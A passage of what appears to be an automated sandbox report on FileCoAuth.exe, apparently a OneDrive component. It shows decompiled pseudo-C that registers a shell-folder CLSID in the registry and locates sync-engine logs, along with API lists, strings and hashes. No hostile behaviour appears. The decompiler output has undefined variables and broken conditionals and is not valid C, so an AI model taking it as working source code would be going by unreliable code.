								_t324 = E00E9F5DC(0x80000001, _t330 - 0x28, _t330 - 0x40, _t330 - 0x58, _t259, 0);
								 *(_t330 - 4) = 9;
								E00E94307(_t330 - 0x40, 1, 0);
								 *(_t330 - 4) = 8;
								E00E94307(_t330 - 0x58, 1, 0);
								 *(_t330 - 4) = 7;
								E00E94307(_t330 - 0x88, 1, 0);
								 *(_t330 - 4) = 0;
								E00E94307(_t330 - 0x28, 1, 0);
								_t337 = _t324;
								if(_t324 >= 0) {
									E00E9A1D7(_t330 - 0x28, _t330 - 0x70);
									 *(_t330 - 4) = 0xb;
									_t327 = L"\\Instance";
									E00E98198(_t330 - 0x28, _t337, _t327, E00E94E74(L"\\Instance"));
									E00E94E9D(_t330 - 0x58, L"{0E5AAE11-A475-4c5b-AB00-C66DE400274E}");
									 *(_t330 - 4) = 0xc;
									E00E94E9D(_t330 - 0x40, L"CLSID");
									 *(_t330 - 4) = 0xd;
									_t324 = E00E9F5DC(0x80000001, _t330 - 0x28, _t330 - 0x40, _t330 - 0x58, _t259, 0);
									 *(_t330 - 4) = 0xc;
									E00E94307(_t330 - 0x40, 1, 0);
									 *(_t330 - 4) = 0xb;
									E00E94307(_t330 - 0x58, 1, 0);
									 *(_t330 - 4) = 0;
									E00E94307(_t330 - 0x28, 1, 0);
									_t338 = _t324;
									if(_t324 >= 0) {
										E00E9A1D7(_t330 - 0x28, _t330 - 0x70);
										 *(_t330 - 4) = 0xe;
										_t328 =  *0xeb0078; // 0xea6fb0
										E00E98198(_t330 - 0x28, _t338, _t328, E00E94E74(_t328));
										 *((intOrPtr*)(_t330 - 0x94)) = 0x11;
										E00E94E9D(_t330 - 0x40, L"Attributes");
										 *(_t330 - 4) = 0xf;
										_t324 = E00E9F559(0x80000001, _t330 - 0x28, _t330 - 0x40, _t330 - 0x94, _t259);
										 *(_t330 - 4) = 0xe;
										E00E94307(_t330 - 0x40, 1, 0);
										if(_t324 >= 0) {
											if( *((char*)(_t330 + 0x14)) == 0 ||  *((char*)(_t330 + 0x18)) != 0) {
												E00E94E9D(_t330 - 0x40,  *0xeb0080);
												 *(_t330 - 4) = 0x12;
												_t324 = E00E9F5DC(0x80000001, _t330 - 0x28, _t330 - 0x40,  *((intOrPtr*)(_t330 - 0x8c)), _t259, 0);
												 *(_t330 - 4) = 0xe;
												_t309 = _t330 - 0x40;
											} else {
												E00E94E9D(_t330 - 0x58, L"{a52bba46-e9e1-435f-b3d9-28daa648c0f6}");
												 *(_t330 - 4) = 0x10;
												E00E94E9D(_t330 - 0x40,  *0xeb0084);
												 *(_t330 - 4) = 0x11;
												_t324 = E00E9F5DC(0x80000001, _t330 - 0x28, _t330 - 0x40, _t330 - 0x58, _t259, 0);
												 *(_t330 - 4) = 0x10;
												E00E94307(_t330 - 0x40, 1, 0);
												 *(_t330 - 4) = 0xe;
												_t309 = _t330 - 0x58;
											}
											E00E94307(_t309, 1, 0);
										}
										 *(_t330 - 4) = 0;
										E00E94307(_t330 - 0x28, 1, 0);
										_t342 = _t324;
										if(_t324 >= 0) {
											E00E9A1D7(_t330 - 0x28, _t330 - 0x70);
											 *(_t330 - 4) = 0x13;
											_t329 = L"\\ShellFolder";
											E00E98198(_t330 - 0x28, _t342, _t329, E00E94E74(L"\\ShellFolder"));
											 *((intOrPtr*)(_t330 - 0x8c)) = 0x28;
											E00E94E9D(_t330 - 0x40, L"FolderValueFlags");
											 *(_t330 - 4) = 0x14;
											_t324 = E00E9F559(0x80000001, _t330 - 0x28, _t330 - 0x40, _t330 - 0x8c, _t259);
											 *(_t330 - 4) = 0x13;
											E00E94307(_t330 - 0x40, 1, 0);
											if(_t236 >= 0) {
												 *((intOrPtr*)(_t330 - 0x8c)) = 0xf080004d;
												E00E94E9D(_t330 - 0x40, L"Attributes");
												 *(_t330 - 4) = 0x15;
												_t324 = E00E9F559(0x80000001, _t330 - 0x28, _t330 - 0x40, _t330 - 0x8c, _t259);
												 *(_t330 - 4) = 0x13;
												E00E94307(_t330 - 0x40, 1, 0);
											}
											 *(_t330 - 4) = 0;
											E00E94307(_t330 - 0x28, 1, 0);
										}
									}
								}
							}
						}
					}
				}
				 *(_t330 - 4) =  *(_t330 - 4) | 0xffffffff;
				E00E94307(_t330 - 0x70, 1, 0);
				return E00EA3152(_t259, 0, _t324);
			}








    0x00ea1c98
    0x00ea1c98
    0x00ea1ca2
    0x00ea1cb3
    0x00ea1cc1
    0x00ea1cc7
    0x00ea1cce
    0x00ea1cd8
    0x00ea1ce5
    0x00ea1cea
    0x00ea1cf2
    0x00ea1d06
    0x00ea1d08
    0x00ea1d15
    0x00ea1d1c
    0x00ea1d2a
    0x00ea1d30
    0x00ea1d35
    0x00ea1d53
    0x00ea1d55
    0x00ea1d5f
    0x00ea1d66
    0x00ea1d74
    0x00ea1d7e
    0x00ea1d83
    0x00ea1da1
    0x00ea1da3
    0x00ea1dad
    0x00ea1db2
    0x00ea1db4
    0x00ea1dc1
    0x00ea1dc6
    0x00ea1dca
    0x00ea1ddb
    0x00ea1de8
    0x00ea1ded
    0x00ea1df9
    0x00ea1dfe
    0x00ea1e1a
    0x00ea1e1c
    0x00ea1e28
    0x00ea1e2d
    0x00ea1e37
    0x00ea1e3c
    0x00ea1e46
    0x00ea1e4d
    0x00ea1e9e
    0x00ea1ea3
    0x00ea1eaf
    0x00ea1eb4
    0x00ea1ed2
    0x00ea1ed4
    0x00ea1ede
    0x00ea1ee3
    0x00ea1eed
    0x00ea1ef2
    0x00ea1eff
    0x00ea1f04
    0x00ea1f0e
    0x00ea1f13
    0x00ea1f15
    0x00ea1f22
    0x00ea1f27
    0x00ea1f2b
    0x00ea1f3c
    0x00ea1f49
    0x00ea1f4e
    0x00ea1f5a
    0x00ea1f5f
    0x00ea1f7b
    0x00ea1f7d
    0x00ea1f87
    0x00ea1f8c
    0x00ea1f96
    0x00ea1f9b
    0x00ea1fa5
    0x00ea1faa
    0x00ea1fac
    0x00ea1fb9
    0x00ea1fbe
    0x00ea1fc2
    0x00ea1fd4
    0x00ea1fe1
    0x00ea1feb
    0x00ea1ff0
    0x00ea200e
    0x00ea2010
    0x00ea201a
    0x00ea2021
    0x00ea202b
    0x00ea2091
    0x00ea2096
    0x00ea20b4
    0x00ea20b6
    0x00ea20ba
    0x00ea2033
    0x00ea203b
    0x00ea2040
    0x00ea204d
    0x00ea2052
    0x00ea206e
    0x00ea2070
    0x00ea207a
    0x00ea207f
    0x00ea2083
    0x00ea2083
    0x00ea20c0
    0x00ea20c0
    0x00ea20c5
    0x00ea20d0
    0x00ea20d5
    0x00ea20d7
    0x00ea20e4
    0x00ea20e9
    0x00ea20ed
    0x00ea20fe
    0x00ea210b
    0x00ea2115
    0x00ea211a
    0x00ea2138
    0x00ea213a
    0x00ea2146
    0x00ea214d
    0x00ea2157
    0x00ea2161
    0x00ea2166
    0x00ea2184
    0x00ea2186
    0x00ea2190
    0x00ea2190
    0x00ea2195
    0x00ea21a0
    0x00ea21a0
    0x00ea20d7
    0x00ea1fac
    0x00ea1f15
    0x00ea1e4d
    0x00ea1db4
    0x00ea1d66
    0x00ea21a5
    0x00ea21b1
    0x00ea21bd

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00EA1CA2
      • Part of subcall function 00E95904: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,00000000,?,?,00E99934,?,00000000,000000FF,00000000,?,?,00E912F1,?,00000000,00000000), ref: 00E95920
      • Part of subcall function 00E95904: ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,00000000,00000000,?,?,00E99934,?,00000000,000000FF,00000000,?,?,00E912F1,?,00000000,00000000), ref: 00E95944
      • Part of subcall function 00E9F5DC: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 00E9F60F
      • Part of subcall function 00E9F5DC: RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,00000008,?), ref: 00E9F655
      • Part of subcall function 00E9F5DC: RegCloseKey.ADVAPI32(00000000), ref: 00E9F660
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
      • Part of subcall function 00E9F559: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 00E9F58C
      • Part of subcall function 00E9F559: RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,00000008,00000004), ref: 00E9F5B8
      • Part of subcall function 00E9F559: RegCloseKey.ADVAPI32(00000000), ref: 00E9F5C3
      • Part of subcall function 00E98198: ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,Last known error: ,?,?,00E9828C,Last known error: ,00000000,00000000,?,00E983E9), ref: 00E981E1
      • Part of subcall function 00EA16B7: __EH_prolog3_GS.LIBCMT ref: 00EA16BE
      • Part of subcall function 00EA16B7: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000038,00EA254A,?,?,00000001,00000001,00000000,00EA7340,00EA6EA4,00000000,?,00000000), ref: 00EA170F
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: CloseCreateH_prolog3_ValueXlength_error@std@@$??3@EnvironmentExpandStringsXout_of_range@std@@
    • String ID: %systemroot%\system32\shell32.dll$Attributes$B$CLSID$FolderValueFlags$M$Software\Classes\CLSID\$SortOrderIndex$System.IsPinnedToNameSpaceTree$\InProcServer32$\Instance$\ShellFolder${0E5AAE11-A475-4c5b-AB00-C66DE400274E}${a52bba46-e9e1-435f-b3d9-28daa648c0f6}
    • API String ID: 2726614150-2117654554
    • Opcode ID: 6f89528ee113cba5713611df410a4c3006ca0a6c0f92624a047112a1e0fb162b
    • Instruction ID: 3d97c9820fe9d2a2d7cc52cea41d1dcccd0cacb31a477015f12d627b58e72fbc
    • Opcode Fuzzy Hash: 6f89528ee113cba5713611df410a4c3006ca0a6c0f92624a047112a1e0fb162b
    • Instruction Fuzzy Hash: F5F13EB2801298EEDF11DBE4CC45FDEBBB8AB19304F041199F645BB182DB706A49CB71
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9A537, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 94COMMON
    Download Yara Rule
    C-Code - Quality: 57%
    			E00E9A537(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t22;
				void* _t29;
				void* _t67;
				void* _t70;

				E00EA3194(E00EA3E17, __ebx, __edi, __esi);
				_t67 = __ecx;
				 *((intOrPtr*)(_t70 - 0x21c)) = 0;
				_t22 = E00E9851B(_t70 - 0x21c, "WatsonReport::GetSyncEngineLogLocation");
				 *((intOrPtr*)(_t70 - 4)) = 0;
				E00E982B9(_t70 - 0x21c);
				_t69 = 0x80004005;
				 *((short*)(_t70 - 0x218)) = 0;
				memset(_t70 - 0x216, 0, 0x206);
				_t29 = _t70 - 0x218;
				__imp__SHGetSpecialFolderPathW(0, _t29, 0x1c, 0, (_t22 & 0xffffff00 | __ecx != 0x00000000) & 0x000000ff, L"d:\\dbs\\sh\\odib\\0313_155253\\cmd\\17\\client\\onedrive\\product\\ux\\shared\\watsonreport.cpp", 0x102, L"WatsonReport::GetSyncEngineLogLocation", L"(pSyncEngineLogPath != NULL)", L"Expected non-NULL sync engine log location", 0x2c4);
				_t76 = _t29 - 1;
				if(_t29 == 1) {
					memset(_t70 - 0x2b8, 0, 0x98);
					E00E97773(0, _t70 - 0x2b8, _t67, 0x80004005, _t76);
					 *((char*)(_t70 - 4)) = 1;
					_t56 =  >=  ?  *0xeb1a44 : 0xeb1a44;
					_t78 =  *0xeb1b00 - 8;
					_t37 =  >=  ?  *0xeb1aec : 0xeb1aec;
					E00E97EF0(0, _t67, _t69, _t78);
					E00E990AD(_t67, E00E9817A(_t70 - 0x2b8, _t70 - 0x2d0));
					E00E94307(_t70 - 0x2d0, 1, 0);
					_t69 = 0;
					E00E97DF8();
					__imp__??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ(E00E99D69(0, E00E97EF0(0, _t67, _t69,  *0xeb1b00 - 8), _t67, _t69, _t78), E00E99D69(0, E00E97EF0(0, _t67, 0x80004005,  *0xeb1b00 - 8), _t67, 0x80004005,  *0xeb1b00 - 8), _t70 - 0x2b8, _t70 - 0x218,  >=  ?  *0xeb1a44 : 0xeb1a44,  >=  ?  *0xeb1aec : 0xeb1aec, 0xeb1a44, 0xeb1a44, 2, 1);
				}
				E00E98588();
				return E00EA3152(0, _t67, _t69);
			}







    0x00e9a541
    0x00e9a546
    0x00e9a555
    0x00e9a55b
    0x00e9a571
    0x00e9a585
    0x00e9a58c
    0x00e9a596
    0x00e9a5a5
    0x00e9a5ad
    0x00e9a5b8
    0x00e9a5be
    0x00e9a5c1
    0x00e9a5d4
    0x00e9a5e6
    0x00e9a5eb
    0x00e9a600
    0x00e9a607
    0x00e9a60f
    0x00e9a643
    0x00e9a65d
    0x00e9a66b
    0x00e9a676
    0x00e9a678
    0x00e9a683
    0x00e9a683
    0x00e9a68f
    0x00e9a69b

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9A541
      • Part of subcall function 00E982B9: GetLastError.KERNEL32(BD336131,?,?,?,?,?,00EA3B19,000000FF,?,00E967F9,?,d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\win32api.cpp,000001D1,Win32Api::TaskDialogIndirect,pTaskConfig != NULL,pTaskConfig was NULL), ref: 00E98313
      • Part of subcall function 00E982B9: memset.MSVCR120 ref: 00E98329
      • Part of subcall function 00E982B9: memset.MSVCR120 ref: 00E98369
      • Part of subcall function 00E982B9: _vsnwprintf.MSVCR120 ref: 00E98385
    • memset.MSVCR120 ref: 00E9A5A5
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001C,00000000,00E991C2,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,?,?,00000000), ref: 00E9A5B8
    • memset.MSVCR120 ref: 00E9A5D4
      • Part of subcall function 00E97773: __EH_prolog3.LIBCMT ref: 00E9777A
      • Part of subcall function 00E97773: ??0?$basic_ios@_WU?$char_traits@_W@std@@@std@@IAE@XZ.MSVCP120(00000008,00E9833E,00000002,00000001), ref: 00E97797
      • Part of subcall function 00E97773: ??0?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAE@PAV?$basic_streambuf@_WU?$char_traits@_W@std@@@1@_N@Z.MSVCP120(?,00000000,00000000,00000008,00E9833E,00000002,00000001), ref: 00E977AF
      • Part of subcall function 00E97EF0: __EH_prolog3_catch.LIBCMT ref: 00E97EF7
      • Part of subcall function 00E97EF0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00E98084
      • Part of subcall function 00E99D69: __EH_prolog3_catch.LIBCMT ref: 00E99D70
      • Part of subcall function 00E99D69: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000000,00000000,?,0000003C,00E9A633,?,?,*.log,00EB1AEC,*.log,*.log,00000002,00000001), ref: 00E99F75
      • Part of subcall function 00E97EF0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,00000000,00000024,00E98351,?,?), ref: 00E97FA2
      • Part of subcall function 00E97EF0: ?sputn@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAE_JPB_W_J@Z.MSVCP120(00000000,?,00000000,00000000,00000024,00E98351,?,?), ref: 00E97FD3
      • Part of subcall function 00E97EF0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?), ref: 00E98001
      • Part of subcall function 00E99D69: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP120(?,?,0000003C,00E9A633,?,?,*.log,00EB1AEC,*.log,*.log,00000002,00000001), ref: 00E99DFB
      • Part of subcall function 00E99D69: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,?,0000003C,00E9A633,?,?,*.log,00EB1AEC,*.log,*.log,00000002,00000001), ref: 00E99E4E
      • Part of subcall function 00E99D69: ?widen@?$ctype@_W@std@@QBE_WD@Z.MSVCP120(00EA8DB8,?,0000003C,00E9A633,?,?,*.log,00EB1AEC,*.log,*.log,00000002,00000001), ref: 00E99E96
      • Part of subcall function 00E99D69: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,?,0000003C,00E9A633,?,?,*.log,00EB1AEC,*.log,*.log,00000002,00000001), ref: 00E99EA3
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120(00000001,00000000,00000000,?,00000000,?,*.log,00EB1AEC,*.log,*.log,00000002,00000001), ref: 00E9A683
    Strings
    • *.log, xrefs: 00E9A5EF, 00E9A60E, 00E9A616, 00E9A618
    • Expected non-NULL sync engine log location, xrefs: 00E9A560
    • d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\watsonreport.cpp, xrefs: 00E9A57F
    • (pSyncEngineLogPath != NULL), xrefs: 00E9A565
    • WatsonReport::GetSyncEngineLogLocation, xrefs: 00E9A550
    • WatsonReport::GetSyncEngineLogLocation, xrefs: 00E9A56A
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp Download File
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: U?$char_traits@_$W@std@@@std@@$?sputc@?$basic_streambuf@_memset$?setstate@?$basic_ios@_H_prolog3_catch$??0?$basic_ios@_??0?$basic_ostream@_??1?$basic_ios@_??3@?getloc@ios_base@std@@?sputn@?$basic_streambuf@_?widen@?$ctype@_ErrorFolderH_prolog3H_prolog3_LastPathSpecialV?$basic_streambuf@_Vlocale@2@W@std@@W@std@@@1@__vsnwprintf
    • String ID: (pSyncEngineLogPath != NULL)$*.log$Expected non-NULL sync engine log location$WatsonReport::GetSyncEngineLogLocation$WatsonReport::GetSyncEngineLogLocation$d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\watsonreport.cpp
    • API String ID: 294834291-2328995104
    • Opcode ID: a4d65a63215b8704c924b1fccf69d5cd27cb3dc7f19344b5c7b37c1aedc52f14
    • Instruction ID: 352b1a192f6bee0a94f7c0d6fda261d5d2d7075bb0f5f194fad4de5ff4edf98f
    • Opcode Fuzzy Hash: a4d65a63215b8704c924b1fccf69d5cd27cb3dc7f19344b5c7b37c1aedc52f14
    • Instruction Fuzzy Hash: 4831C471A50308AEDF10EB70CC9AEEE73AD9B25300F001199B005B6092DE74AF89CB50
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9A537, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 94COMMON
    Download Yara Rule
    C-Code - Quality: 57%
    			E00E9A537(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t22;
				void* _t29;
				void* _t67;
				void* _t70;

				E00EA3194(E00EA3E17, __ebx, __edi, __esi);
				_t67 = __ecx;
				 *((intOrPtr*)(_t70 - 0x21c)) = 0;
				_t22 = E00E9851B(_t70 - 0x21c, "WatsonReport::GetSyncEngineLogLocation");
				 *((intOrPtr*)(_t70 - 4)) = 0;
				E00E982B9(_t70 - 0x21c);
				_t69 = 0x80004005;
				 *((short*)(_t70 - 0x218)) = 0;
				memset(_t70 - 0x216, 0, 0x206);
				_t29 = _t70 - 0x218;
				__imp__SHGetSpecialFolderPathW(0, _t29, 0x1c, 0, (_t22 & 0xffffff00 | __ecx != 0x00000000) & 0x000000ff, L"d:\\dbs\\sh\\odib\\0313_155253\\cmd\\17\\client\\onedrive\\product\\ux\\shared\\watsonreport.cpp", 0x102, L"WatsonReport::GetSyncEngineLogLocation", L"(pSyncEngineLogPath != NULL)", L"Expected non-NULL sync engine log location", 0x2c4);
				_t76 = _t29 - 1;
				if(_t29 == 1) {
					memset(_t70 - 0x2b8, 0, 0x98);
					E00E97773(0, _t70 - 0x2b8, _t67, 0x80004005, _t76);
					 *((char*)(_t70 - 4)) = 1;
					_t56 =  >=  ?  *0xeb1a44 : 0xeb1a44;
					_t78 =  *0xeb1b00 - 8;
					_t37 =  >=  ?  *0xeb1aec : 0xeb1aec;
					E00E97EF0(0, _t67, _t69, _t78);
					E00E990AD(_t67, E00E9817A(_t70 - 0x2b8, _t70 - 0x2d0));
					E00E94307(_t70 - 0x2d0, 1, 0);
					_t69 = 0;
					E00E97DF8();
					__imp__??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ(E00E99D69(0, E00E97EF0(0, _t67, _t69,  *0xeb1b00 - 8), _t67, _t69, _t78), E00E99D69(0, E00E97EF0(0, _t67, 0x80004005,  *0xeb1b00 - 8), _t67, 0x80004005,  *0xeb1b00 - 8), _t70 - 0x2b8, _t70 - 0x218,  >=  ?  *0xeb1a44 : 0xeb1a44,  >=  ?  *0xeb1aec : 0xeb1aec, 0xeb1a44, 0xeb1a44, 2, 1);
				}
				E00E98588();
				return E00EA3152(0, _t67, _t69);
			}







    0x00e9a541
    0x00e9a546
    0x00e9a555
    0x00e9a55b
    0x00e9a571
    0x00e9a585
    0x00e9a58c
    0x00e9a596
    0x00e9a5a5
    0x00e9a5ad
    0x00e9a5b8
    0x00e9a5be
    0x00e9a5c1
    0x00e9a5d4
    0x00e9a5e6
    0x00e9a5eb
    0x00e9a600
    0x00e9a607
    0x00e9a60f
    0x00e9a643
    0x00e9a65d
    0x00e9a66b
    0x00e9a676
    0x00e9a678
    0x00e9a683
    0x00e9a683
    0x00e9a68f
    0x00e9a69b

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9A541
      • Part of subcall function 00E982B9: GetLastError.KERNEL32(BB40E64E,?,?,?,?,?,00EA3B19,000000FF,?,00E967F9,?,d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\win32api.cpp,000001D1,Win32Api::TaskDialogIndirect,pTaskConfig != NULL,pTaskConfig was NULL), ref: 00E98313
      • Part of subcall function 00E982B9: memset.MSVCR120 ref: 00E98329
      • Part of subcall function 00E982B9: memset.MSVCR120 ref: 00E98369
      • Part of subcall function 00E982B9: _vsnwprintf.MSVCR120 ref: 00E98385
    • memset.MSVCR120 ref: 00E9A5A5
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001C,00000000,00E991C2,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,?,?,00000000), ref: 00E9A5B8
    • memset.MSVCR120 ref: 00E9A5D4
      • Part of subcall function 00E97773: __EH_prolog3.LIBCMT ref: 00E9777A
      • Part of subcall function 00E97773: ??0?$basic_ios@_WU?$char_traits@_W@std@@@std@@IAE@XZ.MSVCP120(00000008,00E9833E,00000002,00000001), ref: 00E97797
      • Part of subcall function 00E97773: ??0?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAE@PAV?$basic_streambuf@_WU?$char_traits@_W@std@@@1@_N@Z.MSVCP120(?,00000000,00000000,00000008,00E9833E,00000002,00000001), ref: 00E977AF
      • Part of subcall function 00E97EF0: __EH_prolog3_catch.LIBCMT ref: 00E97EF7
      • Part of subcall function 00E97EF0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00E98084
      • Part of subcall function 00E99D69: __EH_prolog3_catch.LIBCMT ref: 00E99D70
      • Part of subcall function 00E99D69: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000000,00000000,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99F75
      • Part of subcall function 00E97EF0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,00000000,00000024,00E98351,?,?), ref: 00E97FA2
      • Part of subcall function 00E97EF0: ?sputn@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAE_JPB_W_J@Z.MSVCP120(00000000,?,00000000,00000000,00000024,00E98351,?,?), ref: 00E97FD3
      • Part of subcall function 00E97EF0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?), ref: 00E98001
      • Part of subcall function 00E99D69: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP120(?,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99DFB
      • Part of subcall function 00E99D69: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99E4E
      • Part of subcall function 00E99D69: ?widen@?$ctype@_W@std@@QBE_WD@Z.MSVCP120(00EA8DB8,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99E96
      • Part of subcall function 00E99D69: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99EA3
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120(00000001,00000000,00000000,?,00000000,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E9A683
    Strings
    • d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\watsonreport.cpp, xrefs: 00E9A57F
    • WatsonReport::GetSyncEngineLogLocation, xrefs: 00E9A56A
    • Expected non-NULL sync engine log location, xrefs: 00E9A560
    • WatsonReport::GetSyncEngineLogLocation, xrefs: 00E9A550
    • (pSyncEngineLogPath != NULL), xrefs: 00E9A565
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: U?$char_traits@_$W@std@@@std@@$?sputc@?$basic_streambuf@_memset$?setstate@?$basic_ios@_H_prolog3_catch$??0?$basic_ios@_??0?$basic_ostream@_??1?$basic_ios@_??3@?getloc@ios_base@std@@?sputn@?$basic_streambuf@_?widen@?$ctype@_ErrorFolderH_prolog3H_prolog3_LastPathSpecialV?$basic_streambuf@_Vlocale@2@W@std@@W@std@@@1@__vsnwprintf
    • String ID: (pSyncEngineLogPath != NULL)$Expected non-NULL sync engine log location$WatsonReport::GetSyncEngineLogLocation$WatsonReport::GetSyncEngineLogLocation$d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\watsonreport.cpp
    • API String ID: 294834291-2325178540
    • Opcode ID: a4d65a63215b8704c924b1fccf69d5cd27cb3dc7f19344b5c7b37c1aedc52f14
    • Instruction ID: 352b1a192f6bee0a94f7c0d6fda261d5d2d7075bb0f5f194fad4de5ff4edf98f
    • Opcode Fuzzy Hash: a4d65a63215b8704c924b1fccf69d5cd27cb3dc7f19344b5c7b37c1aedc52f14
    • Instruction Fuzzy Hash: 4831C471A50308AEDF10EB70CC9AEEE73AD9B25300F001199B005B6092DE74AF89CB50
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9A69C, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 81COMMON
    Download Yara Rule
    C-Code - Quality: 51%
    			E00E9A69C(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t22;
				void* _t29;
				void* _t50;
				void* _t59;
				void* _t62;

				E00EA3194(E00EA3E17, __ebx, __edi, __esi);
				_t59 = __ecx;
				 *((intOrPtr*)(_t62 - 0x21c)) = 0;
				_t22 = E00E9851B(_t62 - 0x21c, "WatsonReport::GetSetupLogsLocation");
				 *((intOrPtr*)(_t62 - 4)) = 0;
				E00E982B9(_t62 - 0x21c);
				_t61 = 0x80004005;
				 *((short*)(_t62 - 0x218)) = 0;
				memset(_t62 - 0x216, 0, 0x206);
				_t29 = _t62 - 0x218;
